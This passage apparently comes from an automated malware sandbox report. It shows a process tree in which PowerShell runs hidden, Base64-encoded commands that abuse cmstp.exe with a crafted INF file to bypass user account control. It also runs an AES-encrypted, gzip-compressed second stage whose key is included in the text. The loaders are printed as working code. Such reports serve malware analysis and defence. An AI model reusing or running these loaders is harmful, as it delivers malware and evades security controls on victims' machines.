16);$WpXrWka.Dispose();$tZUSbrft = New-Object System.IO.MemoryStream( , $AbQURXmxw );$UfhVzIKO = New-Object System.IO.MemoryStream;$KFAgbvVxM = New-Object System.IO.Compression.GzipStream $tZUSbrft, ([IO.Compression.CompressionMode]::Decompress);$KFAgbvVxM.CopyTo( $UfhVzIKO );$KFAgbvVxM.Close();$tZUSbrft.Close();[byte[]] $qvUGhdu = $UfhVzIKO.ToArray();$AjSplBV = [System.Text.Encoding]::UTF8.GetString($qvUGhdu);$AjSplBV | powershell -3⤵
- Suspicious use of WriteProcessMemory
PID:3564 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -ExecutionPolicy UnRestricted -Encoded DQAKAEEAZABkAC0AVAB5AHAAZQAgAC0ATgBhAG0AZQAgAEMAbwBuAHMAbwBsAGUAVQB0AGkAbABzACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAFcAUABJAEEAIAAtAE0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACcADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0ADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAUABvAHMAdABNAGUAcwBzAGEAZwBlACgAaQBuAHQAIABoAFcAbgBkACwAIAB1AGkAbgB0ACAATQBzAGcALAAgAGkAbgB0ACAAdwBQAGEAcgBhAG0ALAAgAGkAbgB0ACAAbABQAGEAcgBhAG0AKQA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbwBuAHMAdAAgAGkAbgB0ACAAVwBNAF8AQwBIAEEAUgAgAD0AIAAwAHgAMAAxADAAMAA7AA0ACgAnAEAADQAKAEYAdQBuAGMAdABpAG8AbgAgAHMAYwByAGkAcAB0ADoAUwBlAHQALQBJAE4ARgBGAGkAbABlACAAewBbAEMAbQBkAGwAZQB0AEIAaQBuAGQAaQBuAGcAKAApAF0AUABhAHIAYQBtACAAKAAkAEkAbgBmAEYAaQBsAGUATABvAGMAYQB0AGkAbwBuACAAPQAgACIAJABlAG4AdgA6AHQAZQBtAHAAXABDAE0AUwBUAFAALgBpAG4AZgAiACwAWwBTAHQAcgBpAG4AZwBdACQAQwBvAG0AbQBhAG4AZABUAG8ARQB4AGUAYwB1AHQAZQAgAD0AIAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAB1AG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAAaABpAGQAZABlAG4AIAAtAEUAbgBjAG8AZABlAGQAIAAiACAAVQBnAEIARgBBAEUAYwBBAEkAQQBCAEIAQQBHAFEAQQBaAEEAQQBnAEEAQwBJAEEAUwBBAEIATABBAEUAVQBBAFcAUQBCAGYAQQBFAE0AQQBUAEEAQgBCAEEARgBNAEEAVQB3AEIARgBBAEYATQBBAFgAdwBCAFMAQQBFADgAQQBUAHcAQgBVAEEARgB3AEEAUQB3AEIATQBBAEYATQBBAFMAUQBCAEUAQQBGAHcAQQBlAHcAQQAyAEEARABRAEEATgBRAEIARwBBAEUAWQBBAE0AQQBBADAAQQBEAEEAQQBMAFEAQQAxAEEARABBAEEATwBBAEEAeABBAEMAMABBAE0AUQBBAHcAQQBEAEUAQQBRAGcAQQB0AEEARABrAEEAUgBnAEEAdwBBAEQAZwBBAEwAUQBBAHcAQQBEAEEAQQBRAFEAQgBCAEEARABBAEEATQBBAEEAeQBBAEUAWQBBAE8AUQBBADEAQQBEAFEAQQBSAFEAQgA5AEEARgB3AEEAYwB3AEIAbwBBAEcAVQBBAGIAQQBCAHMAQQBGAHcAQQBiAHcAQgB3AEEARwBVAEEAYgBnAEIAYwBBAEcATQBBAGIAdwBCAHQAQQBHADAAQQBZAFEAQgB1AEEARwBRAEEASQBnAEEAZwBBAEMAOABBAFoAZwBBAGcAQQBDADgAQQBkAGcAQgBsAEEAQwBBAEEATAB3AEIAMABBAEMAQQBBAFUAZwBCAEYAQQBFAGMAQQBYAHcAQgBUAEEARgBvAEEASQBBAEEAdgBBAEcAUQBBAEkAQQBCAEQAQQBEAG8AQQBYAEEAQgBWAEEASABNAEEAWgBRAEIAeQBBAEgATQBBAFgAQQBCAEIAQQBHAFEAQQBiAFEAQgBwAEEARwA0AEEAWABBAEIAQgBBAEgAQQBBAGMAQQBCAEUAQQBHAEUAQQBkAEEAQgBoAEEARgB3AEEAVQBnAEIAdgBBAEcARQBBAGIAUQBCAHAAQQBHADQAQQBaAHcAQgBjAEEARQBrAEEAYgB3AEIAdQBBAEcAawBBAFkAdwBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARwBJAEEAWQBRAEIAdQBBAEcAUQBBAFgAQQBCAGoAQQBHAHcAQQBhAFEAQgBsAEEARwA0AEEAZABBAEEAegBBAEQASQBBAEwAZwBCAGwAQQBIAGcAQQBaAFEAQQA3AEEAQwBRAEEAUQBRAEIAagBBAEgAUQBBAGEAUQBCAHYAQQBHADQAQQBJAEEAQQA5AEEAQwBBAEEASwBBAEIATwBBAEcAVQBBAGQAdwBBAHQAQQBGAE0AQQBZAHcAQgBvAEEARwBVAEEAWgBBAEIAMQBBAEcAdwBBAFoAUQBCAGsAQQBGAFEAQQBZAFEAQgB6AEEARwBzAEEAUQBRAEIAagBBAEgAUQBBAGEAUQBCAHYAQQBHADQAQQBJAEEAQQB0AEEARQBVAEEAZQBBAEIAbABBAEcATQBBAGQAUQBCADAAQQBHAFUAQQBJAEEAQgBEAEEARABvAEEAWABBAEIAVgBBAEgATQBBAFoAUQBCAHkAQQBIAE0AQQBYAEEAQgBCAEEARwBRAEEAYgBRAEIAcABBAEcANABBAFgAQQBCAEIAQQBIAEEAQQBjAEEAQgBFAEEARwBFAEEAZABBAEIAaABBAEYAdwBBAFUAZwBCAHYAQQBHAEUAQQBiAFEAQgBwAEEARwA0AEEAWgB3AEIAYwBBAEUAawBBAGIAdwBCAHUAQQBHAGsAQQBZAHcAQgBDAEEARwBFAEEAYwB3AEIAbABBAEcASQBBAFkAUQBCAHUAQQBHAFEAQQBYAEEAQgBqAEEARwB3AEEAYQBRAEIAbABBAEcANABBAGQAQQBBAHoAQQBEAEkAQQBMAGcAQgBsAEEASABnAEEAWgBRAEEAcABBAEQAcwBBAEoAQQBCAFUAQQBIAEkAQQBhAFEAQgBuAEEARwBjAEEAWgBRAEIAeQBBAEMAQQBBAFAAUQBBAGcAQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAVQB3AEIAagBBAEcAZwBBAFoAUQBCAGsAQQBIAFUAQQBiAEEAQgBsAEEARwBRAEEAVgBBAEIAaABBAEgATQBBAGEAdwBCAFUAQQBIAEkAQQBhAFEAQgBuAEEARwBjAEEAWgBRAEIAeQBBAEMAQQBBAEwAUQBCAEIAQQBIAFEAQQBUAEEAQgB2AEEARwBjAEEAVAB3AEIAdQBBAEQAcwBBAFUAZwBCAGwAQQBHAGMAQQBhAFEAQgB6AEEASABRAEEAWgBRAEIAeQBBAEMAMABBAFUAdwBCAGoAQQBHAGcAQQBaAFEAQgBrAEEASABVAEEAYgBBAEIAbABBAEcAUQBBAFYAQQBCAGgAQQBIAE0AQQBhAHcAQQBnAEEAQwAwAEEAVgBBAEIAaABBAEgATQBBAGEAdwBCAE8AQQBHAEUAQQBiAFEAQgBsAEEAQwBBAEEASQBnAEIAQwBBAEcARQBBAFkAdwBCAHIAQQBHAGMAQQBjAGcAQgB2AEEASABVAEEAYgBnAEIAawBBAEUATQBBAGEAQQBCAGwAQQBHAE0AQQBhAHcAQQBpAEEAQwBBAEEATABRAEIAQgBBAEcATQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQQBnAEEAQwBRAEEAUQBRAEIAagBBAEgAUQBBAGEAUQBCAHYAQQBHADQAQQBJAEEAQQB0AEEARgBRAEEAYwBnAEIAcABBAEcAYwBBAFoAdwBCAGwAQQBIAEkAQQBJAEEAQQBrAEEARgBRAEEAYwBnAEIAcABBAEcAYwBBAFoAdwBCAGwAQQBIAEkAQQBJAEEAQQB0AEEARgBJAEEAZABRAEIAdQBBAEUAdwBBAFoAUQBCADIAQQBHAFUAQQBiAEEAQQBnAEEAQwBJAEEAUwBBAEIAcABBAEcAYwBBAGEAQQBCAGwAQQBIAE0AQQBkAEEAQQBpAEEAQwBBAEEATABRAEIARwBBAEcAOABBAGMAZwBCAGoAQQBHAFUAQQBPAHcAQgBUAEEASABRAEEAWQBRAEIAeQBBAEgAUQBBAEwAUQBCAFEAQQBIAEkAQQBiAHcAQgBqAEEARwBVAEEAYwB3AEIAegBBAEMAQQBBAFEAdwBBADYAQQBGAHcAQQBWAFEAQgB6AEEARwBVAEEAYwBnAEIAegBBAEYAdwBBAFEAUQBCAGsAQQBHADAAQQBhAFEAQgB1AEEARgB3AEEAUQBRAEIAdwBBAEgAQQBBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARgBJAEEAYgB3AEIAaABBAEcAMABBAGEAUQBCAHUAQQBHAGMAQQBYAEEAQgBKAEEARwA4AEEAYgBnAEIAcABBAEcATQBBAFEAZwBCAGgAQQBIAE0AQQBaAFEAQgBpAEEARwBFAEEAYgBnAEIAawBBAEYAdwBBAFkAdwBCAHMAQQBHAGsAQQBaAFEAQgB1AEEASABRAEEATQB3AEEAeQBBAEMANABBAFoAUQBCADQAQQBHAFUAQQAiACcAKQAkAEkAbgBmAEMAbwBuAHQAZQBuAHQAPQBAACIADQAKAFsAdgBlAHIAcwBpAG8AbgBdAA0ACgBTAGkAZwBuAGEAdAB1AHIAZQAgAD0AYAAkAGMAaABpAGMAYQBnAG8AYAAkAA0ACgBBAGQAdgBhAG4AYwBlAGQASQBOAEYAIAA9ACAAMgAuADUADQAKAFsARABlAGYAYQB1AGwAdABJAG4AcwB0AGEAbABsAF0ADQAKAEMAdQBzAHQAbwBtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgAD0AIABDAHUAcwB0AEkAbgBzAHQARABlAHMAdABTAGUAYwB0AGkAbwBuAEEAbABsAFUAcwBlAHIAcwANAAoAUgB1AG4AUAByAGUAUwBlAHQAdQBwAEMAbwBtAG0AYQBuAGQAcwAgAD0AIABSAHUAbgBQAHIAZQBTAGUAdAB1AHAAQwBvAG0AbQBhAG4AZABzAFMAZQBjAHQAaQBvAG4ADQAKAFsAUgB1AG4AUAByAGUAUwBlAHQAdQBwAEMAbwBtAG0AYQBuAGQAcwBTAGUAYwB0AGkAbwBuAF0ADQAKADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAA0ACgAkAEMAbwBtAG0AYQBuAGQAVABvAEUAeABlAGMAdQB0AGUADQAKAHQAYQBzAGsAawBpAGwAbAAgAC8ASQBNACAAYwBtAHMAdABwAC4AZQB4AGUAIAAvAEYADQAKAFsAQwB1AHMAdABJAG4AcwB0AEQAZQBzAHQAUwBlAGMAdABpAG8AbgBBAGwAbABVAHMAZQByAHMAXQANAAoANAA5ADAAMAAwACwANAA5ADAAMAAxAD0AQQBsAGwAVQBTAGUAcgBfAEwARABJAEQAUwBlAGMAdABpAG8AbgAsACAANwANAAoAWwBBAGwAbABVAFMAZQByAF8ATABEAEkARABTAGUAYwB0AGkAbwBuAF0ADQAKACIASABLAEwATQAiACwAIAAiAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAEEAcABwACAAUABhAHQAaABzAFwAQwBNAE0ARwBSADMAMgAuAEUAWABFACIALAAgACIAUAByAG8AZgBpAGwAZQBJAG4AcwB0AGEAbABsAFAAYQB0AGgAIgAsACAAIgAlAFUAbgBlAHgAcABlAGMAdABlAGQARQByAHIAbwByACUAIgAsACAAIgAiAA0ACgBbAFMAdAByAGkAbgBnAHMAXQANAAoAUwBlAHIAdgBpAGMAZQBOAGEAbQBlAD0AIgBOAG8AdABlAHAAYQBkACIADQAKAFMAaABvAHIAdABTAHYAYwBOAGEAbQBlAD0AIgBOAG8AdABlAHAAYQBkACIADQAKACIAQAA7ACQASQBuAGYAQwBvAG4AdABlAG4AdAAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAkAEkAbgBmAEYAaQBsAGUATABvAGMAYQB0AGkAbwBuACAALQBFAG4AYwBvAGQAaQBuAGcAIABBAFMAQwBJAEkAfQBGAHUAbgBjAHQAaQBvAG4AIABHAGUAdAAtAEgAdwBuAGQAewBbAEMAbQBkAGwAZQB0AEIAaQBuAGQAaQBuAGcAKAApAF0AUABhAHIAYQBtACgAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJABUAHIAdQBlACwAVgBhAGwAdQBlAEYAcgBvAG0AUABpAHAAZQBsAGkAbgBlAEIAeQBQAHIAbwBwAGUAcgB0AHkATgBhAG0AZQA9ACQAVAByAHUAZQApAF0AWwBzAHQAcgBpAG4AZwBdACQAUAByAG8AYwBlAHMAcwBOAGEAbQBlACkAUAByAG8AYwBlAHMAcwB7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAnAFMAdABvAHAAJwA7AFQAcgB5AHsAJABoAHcAbgBkACAAPQAgAEcAZQB0AC0AUAByAG8AYwBlAHMAcwAgAC0ATgBhAG0AZQAgACQAUAByAG8AYwBlAHMAcwBOAGEAbQBlACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEUAeABwAGEAbgBkAFAAcgBvAHAAZQByAHQAeQAgAE0AYQBpAG4AVwBpAG4AZABvAHcASABhAG4AZABsAGUAOwB9AEMAYQB0AGMAaAB7ACQAaAB3AG4AZAA9ACQAbgB1AGwAbAA7AH0AJABoAGEAcwBoAD0AQAB7AFAAcgBvAGMAZQBzAHMATgBhAG0AZQA9ACQAUAByAG8AYwBlAHMAcwBOAGEAbQBlADsASAB3AG4AZAA9ACQAaAB3AG4AZAA7AH0AOwBOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABQAHMATwBiAGoAZQBjAHQAIAAtAFAAcgBvAHAAZQByAHQAeQAgACQAaABhAHMAaAB9AH0AZgB1AG4AYwB0AGkAbwBuACAAUwBlAHQALQBXAGkAbgBkAG8AdwBBAGMAdABpAHYAZQB7AFsAQwBtAGQAbABlAHQAQgBpAG4AZABpAG4AZwAoACkAXQBQAGEAcgBhAG0AKABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAFQAcgB1AGUALABWAGEAbAB1AGUARgByAG8AbQBQAGkAcABlAGwAaQBuAGUAQgB5AFAAcgBvAHAAZQByAHQAeQBOAGEAbQBlAD0AJABUAHIAdQBlACkAXQBbAHMAdAByAGkAbgBnAF0AJABOAGEAbQBlACkAUAByAG8AYwBlAHMAcwB7ACQAaAB3AG4AZAA9AEcAZQB0AC0ASAB3AG4AZAAgAC0AUAByAG8AYwBlAHMAcwBOAGEAbQBlACAAJABOAGEAbQBlACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEUAeABwAGEAbgBkAFAAcgBvAHAAZQByAHQAeQAgAEgAdwBuAGQAOwBbAGkAbgB0AF0AJABoAGEAbgBkAGwAZQA9ACQAaAB3AG4AZAA7AGkAZgAoACQAaABhAG4AZABsAGUAIAAtAGcAdAAgADAAKQB7AFsAdgBvAGkAZABdAFsAVwBQAEkAQQAuAEMAbwBuAHMAbwBsAGUAVQB0AGkAbABzAF0AOgA6AFAAbwBzAHQATQBlAHMAcwBhAGcAZQAoACQAaABhAG4AZABsAGUALABbAFcAUABJAEEALgBDAG8AbgBzAG8AbABlAFUAdABpAGwAcwBdADoAOgBXAE0AXwBDAEgAQQBSACwAMQAzACwAMAApAH0AJABoAGEAcwBoAD0AQAB7AFAAcgBvAGMAZQBzAHMAPQAkAE4AYQBtAGUAOwBIAHcAbgBkAD0AJABoAHcAbgBkAH0AOwBOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABQAHMATwBiAGoAZQBjAHQAIAAtAFAAcgBvAHAAZQByAHQAeQAgACQAaABhAHMAaAB9AH0AOwAuACAAUwBlAHQALQBJAE4ARgBGAGkAbABlADsAYQBkAGQALQB0AHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7AEkAZgAoAFQAZQBzAHQALQBQAGEAdABoACAAJABJAG4AZgBGAGkAbABlAEwAbwBjAGEAdABpAG8AbgApAHsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAbQBzAHQAcAAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC8AYQB1ACAAIgAiACQASQBuAGYARgBpAGwAZQBMAG8AYwBhAHQAaQBvAG4AIgAiACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAE0AaQBuAGkAbQBpAHoAZQBkADsAZABvAHsAfQB1AG4AdABpAGwAKAAoAFMAZQB0AC0AVwBpAG4AZABvAHcAQQBjAHQAaQB2AGUAIABjAG0AcwB0AHAAKQAuAEgAdwBuAGQAIAAtAG4AZQAgADAAKQB9AA0ACgA=5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4784 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\beumlt25\beumlt25.cmdline"6⤵
- Suspicious use of WriteProcessMemory
PID:3228 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES42F0.tmp" "c:\Users\Admin\AppData\Local\Temp\beumlt25\CSCF5AF3DF95E0D4AF7A03E278C2DF0CAFC.TMP"7⤵PID:2796
-
-
-
C:\Windows\SysWOW64\cmstp.exe"C:\Windows\system32\cmstp.exe" /au "C:\Users\Admin\AppData\Local\Temp\CMSTP.inf"6⤵PID:2188
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe $uGSyEn = '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';$QcRGrPc = 'ZWdYRXFVeWZGcVZNVlJXYWxURnRZc2ZZeFFoUk9XSWQ=';$WpXrWka = New-Object 'System.Security.Cryptography.AesManaged';$WpXrWka.Mode = [System.Security.Cryptography.CipherMode]::ECB;$WpXrWka.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$WpXrWka.BlockSize = 128;$WpXrWka.KeySize = 256;$WpXrWka.Key = [System.Convert]::FromBase64String($QcRGrPc);$SSGYL = [System.Convert]::FromBase64String($uGSyEn);$yAgygcvl = $SSGYL[0..15];$WpXrWka.IV = $yAgygcvl;$ixbKtdOeJ = $WpXrWka.CreateDecryptor();$AbQURXmxw = $ixbKtdOeJ.TransformFinalBlock($SSGYL, 16, $SSGYL.Length - 16);$WpXrWka.Dispose();$tZUSbrft = New-Object System.IO.MemoryStream( , $AbQURXmxw );$UfhVzIKO = New-Object System.IO.MemoryStream;$KFAgbvVxM = New-Object System.IO.Compression.GzipStream $tZUSbrft, ([IO.Compression.CompressionMode]::Decompress);$KFAgbvVxM.CopyTo( $UfhVzIKO );$KFAgbvVxM.Close();$tZUSbrft.Close();[byte[]] $qvUGhdu = $UfhVzIKO.ToArray();$AjSplBV = [System.Text.Encoding]::UTF8.GetString($qvUGhdu);$AjSplBV4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4572
-
-
-
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}1⤵
- Suspicious use of WriteProcessMemory
PID:3548 -
